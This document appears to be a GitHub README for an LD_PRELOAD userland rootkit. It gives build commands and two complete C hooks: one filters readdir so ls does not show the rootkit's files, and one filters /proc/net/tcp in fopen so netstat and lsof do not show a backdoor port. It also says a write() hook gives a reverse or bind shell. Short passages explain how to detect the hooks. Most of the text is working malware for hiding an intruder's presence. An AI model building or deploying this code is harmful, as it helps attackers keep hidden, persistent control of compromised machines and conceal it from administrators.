LD_PRELOAD Rootkit

Overview

An LD_PRELOAD based userland rootkit written in C. It is built as a shared object and loaded into dynamically linked programs through the LD_PRELOAD loader variable, where it interposes a handful of libc functions (listed below).

How To Compile It?

  • Using Makefile
$ git clone https://github.com/acm-iem/LD_PRELOAD-Rootkit
$ cd LD_PRELOAD-Rootkit
$ make
  • Using GCC
$ gcc smoochum.c -fPIC -shared -D_GNU_SOURCE -o libc.man.so.6 -ldl

Let's break down the command:

  • gcc : Our very own GNU Compiler Collection
  • smoochum.c : The name of our program (Get the Pokémon reference?)
  • -fPIC : Generate position-independent code, as required for a shared object
  • -shared : Create a shared object that the loader can map into other programs instead of an executable
  • -D_GNU_SOURCE : Defines the _GNU_SOURCE feature macro so that <dlfcn.h> exposes RTLD_NEXT, the pseudo-handle passed to dlsym() to find the next definition of a symbol after our library, i.e. the real libc function. Equivalently, put #define _GNU_SOURCE before the includes in the source file
  • -o : Create an output file
  • libc.man.so.6 : Name of the output file (chosen to resemble libc.so.6)
  • -ldl : Link against libdl for dlsym(); on glibc 2.34 and later dlsym lives in libc itself and the flag is harmless
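As an added example (not the project's smoochum.c), here is a minimal source file that the command above builds: it interposes readdir(), looks up the real function with dlsym(RTLD_NEXT, ...), and drops directory entries whose names are on a hide list. The names to hide, the output file name libhide.so and the constructed directory listing used for the offline demo are assumptions made for this example.

```c
/*
 * hide_entries.c: added example of an LD_PRELOAD readdir() hook (not smoochum.c).
 * The hidden names and the fake directory below are assumptions for the example.
 *
 * Build:  gcc hide_entries.c -fPIC -shared -D_GNU_SOURCE -o libhide.so -ldl
 * Use:    LD_PRELOAD=./libhide.so ls -la
 */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE            /* exposes RTLD_NEXT in <dlfcn.h> */
#endif
#include <dirent.h>
#include <dlfcn.h>
#include <string.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)   /* glibc's value, if an earlier include already fixed the feature macros */
#endif

/* Entry names this hook hides (assumed for the example). */
static const char *const hidden_names[] = { "libc.man.so.6", "smoochum.c", NULL };

/* Pure policy: 1 if a directory entry with this name must be hidden. */
int hide_name(const char *name)
{
    for (const char *const *p = hidden_names; *p; p++)
        if (strcmp(name, *p) == 0)
            return 1;
    return 0;
}

typedef struct dirent *(*readdir_fn)(DIR *);

/* Pull entries from `next' and skip the hidden ones. `next' is the real
 * readdir in production and a fake producer in the offline demo below. */
struct dirent *filtered_readdir(readdir_fn next, DIR *dirp)
{
    struct dirent *e;
    while ((e = next(dirp)) != NULL)
        if (!hide_name(e->d_name))
            return e;
    return NULL;
}

/* The interposed readdir(): resolve the real one once via RTLD_NEXT. */
struct dirent *readdir(DIR *dirp)
{
    static readdir_fn real_readdir;
    if (!real_readdir)
        real_readdir = (readdir_fn) dlsym(RTLD_NEXT, "readdir");
    if (!real_readdir)
        return NULL;
    return filtered_readdir(real_readdir, dirp);
}

#ifdef __USE_LARGEFILE64
/* Programs built with _FILE_OFFSET_BITS=64 (coreutils among them) call
 * readdir64 instead, so the large-file variant needs the same treatment. */
typedef struct dirent64 *(*readdir64_fn)(DIR *);
struct dirent64 *readdir64(DIR *dirp)
{
    static readdir64_fn real_readdir64;
    struct dirent64 *e;
    if (!real_readdir64)
        real_readdir64 = (readdir64_fn) dlsym(RTLD_NEXT, "readdir64");
    if (!real_readdir64)
        return NULL;
    while ((e = real_readdir64(dirp)) != NULL && hide_name(e->d_name))
        ;
    return e;
}
#endif

/* --- offline demo on a constructed listing; no filesystem access needed --- */
static struct dirent fake_dir[5];
static size_t fake_pos;

static struct dirent *fake_next(DIR *unused)
{
    (void) unused;
    if (fake_pos >= sizeof fake_dir / sizeof fake_dir[0])
        return NULL;
    return &fake_dir[fake_pos++];
}

/* Runs the filter over the constructed listing and returns the surviving
 * names comma separated: ".,..,README". */
const char *demo_visible_names(void)
{
    static const char *const names[] = { ".", "..", "README", "libc.man.so.6", "smoochum.c" };
    static char out[512];
    struct dirent *e;
    for (size_t i = 0; i < 5; i++)
        strncpy(fake_dir[i].d_name, names[i], sizeof fake_dir[i].d_name - 1);
    fake_pos = 0;
    out[0] = '\0';
    while ((e = filtered_readdir(fake_next, NULL)) != NULL) {
        if (out[0])
            strcat(out, ",");
        strcat(out, e->d_name);
    }
    return out;
}
```

Two caveats worth knowing before relying on this. The hook only affects dynamically linked programs that go through libc's readdir: a statically linked ls (busybox, for instance) or anything issuing the getdents64 syscall directly still sees the real listing, which is also the simplest way to check a suspect host. And the interposition is visible: the library shows up in the LD_PRELOAD environment variable or /etc/ld.so.preload and in /proc/<pid>/maps of every affected process.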

Functions Hooked:

  • ssize_t write(int fd, const void *buf, size_t count) : Provides a reverse or bind shell, depending on the trigger
  • FILE *fopen(const char *pathname, const char *mode) : Hides our connections from netstat and lsof
  • struct dirent *readdir(DIR *dirp) : Hides our shared object from ls

Note: The 64-bit (large-file) variants of these functions, such as fopen64 and readdir64, are hooked as well, since programs built with large-file support call those instead of the plain names.
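The fopen() hook above works because netstat and lsof read the connection table from /proc/net/tcp (and tcp6). The example below, written for this page and not taken from the project, shows that technique: the hook opens the real file, copies every row except those mentioning the port to hide into an unlinked temp file, and hands the caller that temp file instead. The hidden port 4444, the output file name and the /proc/net/tcp snapshot used for the offline demo are assumptions constructed for this example.

```c
/*
 * hide_port.c: added example of an fopen() hook that filters /proc/net/tcp
 * (illustrative code for this page, not the project's hook). The hidden port
 * and the sample table below are assumptions / constructed data.
 *
 * Build: gcc hide_port.c -fPIC -shared -D_GNU_SOURCE -o libhideport.so -ldl
 * Use:   LD_PRELOAD=./libhideport.so netstat -ant
 */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)   /* glibc's value, if feature macros were fixed earlier */
#endif

#define HIDDEN_PORT 4444u   /* assumed: the backdoor port to conceal */

/* /proc/net/tcp rows look like "   1: 0100007F:115C 00000000:0000 0A ...":
 * entry number, local hex-IP:hex-port, remote hex-IP:hex-port. Returns 1 if
 * either port equals `port'. The header row does not parse and is kept. */
int line_mentions_port(const char *line, unsigned port)
{
    unsigned lport, rport;
    if (sscanf(line, "%*d: %*[0-9A-Fa-f]:%x %*[0-9A-Fa-f]:%x", &lport, &rport) != 2)
        return 0;
    return lport == port || rport == port;
}

/* Copy `in' to `out' minus the rows that mention `port'; returns rows kept. */
int filter_lines(FILE *in, FILE *out, unsigned port)
{
    char line[1024];
    int kept = 0;
    while (fgets(line, sizeof line, in)) {
        if (line_mentions_port(line, port))
            continue;
        fputs(line, out);
        kept++;
    }
    return kept;
}

typedef FILE *(*fopen_fn)(const char *, const char *);

static int is_tcp_table(const char *path)
{
    return strcmp(path, "/proc/net/tcp") == 0 || strcmp(path, "/proc/net/tcp6") == 0;
}

/* The interposed fopen(): for the TCP tables, return a temp file holding the
 * filtered rows instead of the real /proc file. */
FILE *fopen(const char *path, const char *mode)
{
    static fopen_fn real_fopen;
    FILE *f, *tmp;
    if (!real_fopen)
        real_fopen = (fopen_fn) dlsym(RTLD_NEXT, "fopen");
    if (!real_fopen)
        return NULL;
    f = real_fopen(path, mode);
    if (!f || !is_tcp_table(path) || mode[0] != 'r')
        return f;
    tmp = tmpfile();
    if (!tmp)
        return f;                 /* filtering impossible: fall back to the real file */
    filter_lines(f, tmp, HIDDEN_PORT);
    fclose(f);
    rewind(tmp);
    return tmp;
}

#ifdef __USE_LARGEFILE64
/* Tools built with _FILE_OFFSET_BITS=64 call fopen64; route it the same way. */
FILE *fopen64(const char *path, const char *mode)
{
    return fopen(path, mode);
}
#endif

/* --- offline demo on a constructed /proc/net/tcp snapshot --- */
static const char sample_tcp[] =
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0\n"
    "   1: 0100007F:115C 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1235 1 0000000000000000 100 0 0 10 0\n"
    "   2: 0100007F:C350 0100007F:115C 01 00000000:00000000 00:00000000 00000000  1000        0 1236 1 0000000000000000 20 4 30 10 -1\n";

/* Rows that survive filtering the sample for HIDDEN_PORT (0x115C):
 * the header and the port-22 listener, i.e. 2. */
int demo_rows_kept(void)
{
    char buf[2048];
    FILE *in = fmemopen((void *) sample_tcp, sizeof sample_tcp - 1, "r");
    FILE *out = fmemopen(buf, sizeof buf, "w");
    int kept;
    if (!in || !out)
        return -1;
    kept = filter_lines(in, out, HIDDEN_PORT);
    fclose(in);
    fclose(out);
    return kept;
}
```

Scope matters here: the hook covers tools that fopen() the table, such as netstat and lsof, but ss queries the kernel over netlink (sock_diag) and coreutils cat reads /proc/net/tcp with open()/read(), so comparing `netstat -ant` against `ss -ant` or `cat /proc/net/tcp` exposes the hidden rows. Hooking write() or the socket calls does not change that, because the socket is still listed by the kernel.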

To-Do:

  • Add SSL encryption
  • Test and debug IPv6 compatibility
  • Hide our shared object from ldd
  • More!
Owner

ACM | CSI IEM